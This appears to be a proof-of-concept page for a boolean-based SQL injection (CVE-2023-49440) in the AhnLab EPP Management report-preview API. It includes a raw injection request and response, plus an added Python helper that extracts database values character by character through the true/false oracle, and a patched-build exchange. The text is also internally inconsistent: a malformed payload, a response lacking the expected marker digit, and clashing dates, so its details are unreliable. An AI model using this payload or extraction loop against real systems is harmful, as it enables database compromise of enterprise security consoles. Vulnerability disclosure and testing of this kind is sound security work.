CVE-2023-49440 PoC — AhnLab EPP security vulnerability

Source
Associated Vulnerability
Title: AhnLab EPP security vulnerability (CVE-2023-49440)
Description: AhnLab EPP is an endpoint security protection platform from the Korean company AhnLab. AhnLab EPP version 1.0.15 contains a security vulnerability caused by improper handling of the preview parameter, which can lead to SQL injection.
Readme
# CVE-2023-49440-POC
```
Exploit Title: ***AhnLab EPP Management (Centralised Endpoint Security Management) - Boolean-based SQL Injection leading to RCE***

Date: 16 July 2023

CVE: CVE-2023-49440

Vendor Homepage: https://www.ahnlab.com/en

Software Link: https://www.ahnlab.com/ko/product/epp-management

Product Review: https://www.gartner.com/reviews/market/endpoint-protection-platforms/compare/product/ahnlab-edr-vs-ahnlab-epp

Reference Link: https://www.cve.org/CVERecord?id=CVE-2023-49440

Vulnerable Version: 1.0.15 and earlier

Fixed Version: releases after 1.0.15 (2023)

***Vulnerability and Product description***:

AhnLab EPP Management is an endpoint protection platform that integrates patch management, advanced malware detection, EDR and XDR capabilities to provide centralised management, real-time monitoring and policy control across enterprise endpoints. A Boolean-based and time-based SQL injection was discovered in the web admin interface of AhnLab EPP Management v1.0.15. It allowed full compromise of the backend database with administrative privileges and limited remote code execution (RCE). Several endpoints were affected; the reproduction below uses the **preview** parameter of the `/api/console/ems/query/report/preview` API, where the second element of the JSON `params` array is placed into the report query without sanitisation, so the result of an injected subquery is returned as a column of the preview. All affected endpoints were patched in releases after v1.0.15, with fixes shipped in 2023.

***This is a proof of reproduction for a Boolean-based SQL injection in AhnLab EPP Management. However, I will not release the Python PoC for security reasons until next year; the affected version was patched over two years ago.***
```
### Request
```
POST /api/console/ems/query/report/preview HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json; charset=utf-8
Accept-Language: de-CA,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate
Authorization: bearer<Token>
Content-Type: application/json; charset=utf-8
Content-Length: 180
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
  "request": {
    "action": "preview_query_report",
    "revision": 1,
    "params": [
      "RDB",
      "(SELECT CONCAT(CONCAT('apple',(CASE WHEN (1010=1010) THEN '1' ELSE '0' END)),'mango'))" a"
    ]
  },
  "data": []
}
```

### Response

```
HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-type: application/json; charset=utf-8
content-length: 135
date:  21 may 2023 11:48:00 GMT
cache-control: no-cache, no-store, no-control
connection: close

{
  "error_code": "EPP-00000",
  "error_msg": "success",
  "revision": 1,
  "response": [
    {
      "report": "[{\"concat\":\"applemango\"}]",
      "item_order": 1
    }
  ]
}

```
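The inference loop a tester would build on top of the exchange above, as an added example that is not part of the original PoC: `build_body` reproduces the captured request shape (`preview_query_report`, `params` of `"RDB"` plus the injected expression) and the apple/mango marker payload, `interpret` reads the verdict back out of the `report` string, and `extract_string` binary-searches each character of an arbitrary SQL expression through that oracle. The `fake_send` simulator and its `FAKE_SECRETS` value are constructed here so the block runs offline; a real run would replace `fake_send` with an HTTPS POST carrying a valid bearer token. The CASE expression in the payload emits `apple1mango` or `apple0mango`, and the interpreter keys on that digit (the captured response above shows `applemango`, without the digit).

```python
"""Boolean-based inference helper for the AhnLab EPP preview endpoint.

Added example, not the PoC author's code. Request shape and marker payload
follow the captured request above; the binary-search loop, fake_send and
FAKE_SECRETS are constructed for an offline demonstration.
"""
import json
import re

MARKER_TRUE = "apple1mango"
MARKER_FALSE = "apple0mango"


def build_body(condition: str) -> dict:
    """Wrap a SQL boolean condition in the marker subquery from the page.

    The expression lands in the preview query as a column, so the report
    row carries apple1mango when the condition holds and apple0mango otherwise.
    """
    expr = ("(SELECT CONCAT(CONCAT('apple',(CASE WHEN ({}) THEN '1' ELSE '0' END))"
            ",'mango'))").format(condition)
    return {
        "request": {
            "action": "preview_query_report",
            "revision": 1,
            "params": ["RDB", expr],
        },
        "data": [],
    }


def interpret(response: dict):
    """Return True/False from the marker, or None when no oracle is present.

    Unpatched builds answer EPP-00000 with the marker inside the "report"
    string; the patched build answers SWU-00027 with an empty response list.
    """
    if response.get("error_code") != "EPP-00000":
        return None
    for item in response.get("response", []):
        report = item.get("report", "")
        if MARKER_TRUE in report:
            return True
        if MARKER_FALSE in report:
            return False
    return None


def extract_string(send, sql_expr: str, max_len: int = 64) -> str:
    """Recover the value of sql_expr one character at a time.

    send(body) -> response dict performs the request. Each character costs
    seven queries (binary search over ASCII 0..127); ASCII() of an empty
    SUBSTRING is 0 in MySQL/MariaDB, which marks the end of the value.
    """
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "ASCII(SUBSTRING(({}),{},1))>{}".format(sql_expr, pos, mid)
            verdict = interpret(send(build_body(cond)))
            if verdict is None:
                raise RuntimeError("no boolean oracle in response (patched build?)")
            if verdict:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


# Constructed offline stand-in for the unpatched backend (hypothetical value).
FAKE_SECRETS = {"version()": "10.6.12-MariaDB"}
_COND_RE = re.compile(r"ASCII\(SUBSTRING\(\((.*)\),(\d+),1\)\)>(\d+)$")


def fake_send(body: dict) -> dict:
    """Answer a build_body() request the way the vulnerable endpoint would."""
    expr = body["request"]["params"][1]
    cond = re.search(r"CASE WHEN \((.*)\) THEN", expr).group(1)
    name, pos, threshold = _COND_RE.match(cond).groups()
    value = FAKE_SECRETS[name]
    pos = int(pos)
    code = ord(value[pos - 1]) if pos <= len(value) else 0
    marker = MARKER_TRUE if code > int(threshold) else MARKER_FALSE
    return {
        "error_code": "EPP-00000",
        "error_msg": "success",
        "revision": 1,
        "response": [{"report": json.dumps([{"concat": marker}]), "item_order": 1}],
    }


if __name__ == "__main__":
    print(json.dumps(build_body("1010=1010"), indent=2))
    print(extract_string(fake_send, "version()"))
```

Against a patched build `interpret` returns `None` for the SWU-00027 response and `extract_string` stops immediately instead of misreading the empty `response` array as a false verdict.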

### Fixed Version

Against a patched build the same marker payload no longer yields a result: the endpoint now expects a conceal key in `data.extract_key` and answers SWU-00027 with an empty `response` array, so no injected column is returned.

### Request

```
POST /api/console/ems/query/report/preview HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json;charset=utf-8
Accept-Language: de-CA,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: bearer <Token>
Content-Type: application/json;charset=utf-8
Content-Length: 241
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
  "request": {
    "action": "preview_query_report",
    "revision": "1",
    "params": [
      "RDB",
      "1",
      "(SELECT CONCAT(CONCAT('apple', (CASE WHEN (1337=1337) THEN '1' ELSE '0' END)), 'mango'))"
    ]
  },
  "data": {
    "extract_key": "<Key>="
  }
}

```
### Response
```

HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
content-type: application/json;charset=utf-8
content-length: 181
date: 16 Sept 2023 10:28:10 GMT
cache-control: no-cache,no-store,no-control
connection: close

{
  "error_code": "SWU-00027",
  "error_msg": "[SWU-00027] Conceal key expired. : \"\\\"extract_key\\\":\\\"<Key>=\\\"\"",
  "revision": 1,
  "response": [
  ]
}

```